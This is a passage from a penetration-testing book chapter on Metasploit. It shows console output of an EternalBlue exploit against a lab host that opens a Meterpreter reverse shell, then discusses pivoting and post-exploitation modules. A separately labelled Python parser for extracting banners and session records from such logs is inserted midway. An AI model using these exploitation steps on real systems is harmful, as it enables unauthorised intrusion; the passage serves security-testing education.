184 | Chapter 6: Owning Metasploit
    for exploitation.
    [+] 192.168.86.48:445 - Connection established for exploitation.
    [+] 192.168.86.48:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 192.168.86.48:445 - CORE raw buffer dump (51 bytes)
    [*] 192.168.86.48:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
    [*] 192.168.86.48:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
    [*] 192.168.86.48:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
    [*] 192.168.86.48:445 - 0x00000030  6b 20 31                                         k 1
    [+] 192.168.86.48:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 192.168.86.48:445 - Trying exploit with 12 Groom Allocations.
    [*] 192.168.86.48:445 - Sending all but last fragment of exploit packet
    [*] 192.168.86.48:445 - Starting non-paged pool grooming
    [+] 192.168.86.48:445 - Sending SMBv2 buffers
    [+] 192.168.86.48:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 192.168.86.48:445 - Sending final SMBv2 buffers.
    [*] 192.168.86.48:445 - Sending last fragment of exploit packet!
    [*] 192.168.86.48:445 - Receiving response from exploit packet
    [+] 192.168.86.48:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 192.168.86.48:445 - Sending egg to corrupted connection.
    [*] 192.168.86.48:445 - Triggering free of corrupted buffer.
    [*] Sending stage (205891 bytes) to 192.168.86.48
    [*] Meterpreter session 2 opened (192.168.86.21:4444 -> 192.168.86.48:49290) at 2018-01-29 18:16:59 -0700
    [+] 192.168.86.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.86.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.86.48:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    meterpreter >
You'll see that the exploit runs exactly the same as it did before. The only difference between these two exploit runs is the payload, which doesn't impact the exploit at all. It only presents us with a different interface to the system. Meterpreter is a great interface that will give you quick and easy access to functions you wouldn't get from just the command interpreter.
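The console output above is worth more than a glance: the CORE raw buffer dump lines carry the target's OS banner in hex, and the "Meterpreter session N opened" line records the exact reverse connection (listener address and port, target address and ephemeral port, timestamp) that a tester needs for the report and a defender would look for in NetFlow or firewall logs. The following Python parser is an added example, not code from the book or from Metasploit; the log it reads is a constructed, trimmed copy of the output shown above. It uses the byte count declared in the dump header to decide how many hex tokens each line holds, because the ASCII column can itself look like hex ("008 R2 ..." begins with a valid byte "00").

```python
"""Parse msfconsole exploit output into structured records (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a trimmed copy of the ms17_010_eternalblue console
# output shown above. The real run has more status lines between these.
SAMPLE_LOG = """\
[+] 192.168.86.48:445 - Connection established for exploitation.
[+] 192.168.86.48:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.86.48:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.86.48:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.86.48:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.86.48:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.86.48:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.86.48:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (205891 bytes) to 192.168.86.48
[*] Meterpreter session 2 opened (192.168.86.21:4444 -> 192.168.86.48:49290) at 2018-01-29 18:16:59 -0700
meterpreter >
"""

DUMP_HEADER = re.compile(r"raw buffer dump \((\d+) bytes\)")
DUMP_LINE = re.compile(r"^\[\*\] \S+ - 0x([0-9a-fA-F]{8})\s+(.*)$")
HEX_BYTE = re.compile(r"^[0-9a-fA-F]{2}$")
SESSION_LINE = re.compile(
    r"^\[\*\] Meterpreter session (\d+) opened "
    r"\((\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)\) "
    r"at (\S+ \S+ [+-]\d{4})$"
)


@dataclass(frozen=True)
class SessionEvent:
    session_id: int
    handler_ip: str      # the listener (LHOST:LPORT) the target called back to
    handler_port: int
    target_ip: str
    target_port: int     # ephemeral source port on the target
    opened_at: str


def decode_buffer_dump(lines: List[str]) -> bytes:
    """Recover the raw bytes of the first 'raw buffer dump' block in `lines`.

    The declared byte count fixes how many hex tokens belong to each line,
    so the trailing ASCII column is never mistaken for more data.
    """
    expected: Optional[int] = None
    data = bytearray()
    for line in lines:
        header = DUMP_HEADER.search(line)
        if header and expected is None:
            expected = int(header.group(1))
            continue
        if expected is None:
            continue
        m = DUMP_LINE.match(line)
        if not m:
            if data:            # dump lines are contiguous; first non-dump line ends it
                break
            continue
        offset = int(m.group(1), 16)
        if offset != len(data):
            raise ValueError(f"non-contiguous dump at offset {offset:#010x}")
        want = min(16, expected - len(data))
        tokens = m.group(2).split()[:want]
        if len(tokens) != want or not all(HEX_BYTE.match(t) for t in tokens):
            raise ValueError(f"malformed dump line: {line!r}")
        data.extend(int(t, 16) for t in tokens)
        if len(data) == expected:
            break
    if expected is None or len(data) != expected:
        raise ValueError("no complete buffer dump found")
    return bytes(data)


def parse_session_events(lines: List[str]) -> List[SessionEvent]:
    """Extract every 'Meterpreter session N opened' line as a structured event."""
    events = []
    for line in lines:
        m = SESSION_LINE.match(line)
        if m:
            events.append(SessionEvent(int(m.group(1)), m.group(2), int(m.group(3)),
                                       m.group(4), int(m.group(5)), m.group(6)))
    return events


def summarize(log_text: str) -> Dict[str, object]:
    """Combine both parsers into the fields a report or a log correlation needs."""
    lines = log_text.splitlines()
    try:
        banner = decode_buffer_dump(lines).decode("ascii", errors="replace")
    except ValueError:
        banner = None           # no dump in this log (not every module prints one)
    return {"os_banner": banner, "sessions": parse_session_events(lines)}


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    print("Target OS banner:", result["os_banner"])
    for ev in result["sessions"]:
        print(f"session {ev.session_id}: {ev.target_ip}:{ev.target_port} -> "
              f"{ev.handler_ip}:{ev.handler_port} at {ev.opened_at}")
```

Running the block against the sample yields the banner "Windows Server 2008 R2 Standard 7601 Service Pack 1" and one session record for 192.168.86.48:49290 -> 192.168.86.21:4444. The target-side tuple in that record is the one to match against egress logs on the target network; the 4444 listener is a default that many environments already alert on.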
Using Meterpreter

Once we have our Meterpreter shell, we can start using it to gather information. We can download files. We can upload files. We can get file and process listings. I've mentioned before that Meterpreter is operating system agnostic. This means that the same set of commands will work no matter what operating system has been compromised. It also means that when you are looking at processes or file listings, you don't need to know the specifics about the operating system or the operating system commands. Instead, you just need to know the Meterpreter commands.

Keep in mind that not all exploits will use the Meterpreter payload. More than that, not all exploits will be capable of using a Meterpreter payload. Everything in this section is relevant only when you are able to use a Meterpreter-based payload.

While exploiting and gaining access to systems is definitely a start, it's not the end goal, or at least it isn't commonly the end goal. After all, when you are performing security testing, you may be asked to see how far you can go, just as an attacker would. Meterpreter provides easy access to functions that will allow us to get deeper into the network by using a technique called pivoting. Pivoting can be accomplished with a post-exploitation module. Post-exploitation modules can also be used to gather a lot of details about the system and users.

One thing to note about the post-exploitation modules is that they are operating system specific. This is different from the Meterpreter commands themselves. Instead, the post-exploitation modules are Ruby scripts, just as the exploit and auxiliary scripts are. They get loaded and executed through the connection between your Kali system and the target system. A Windows system has gather, manage, and capture modules. Linux and macOS have only gather modules.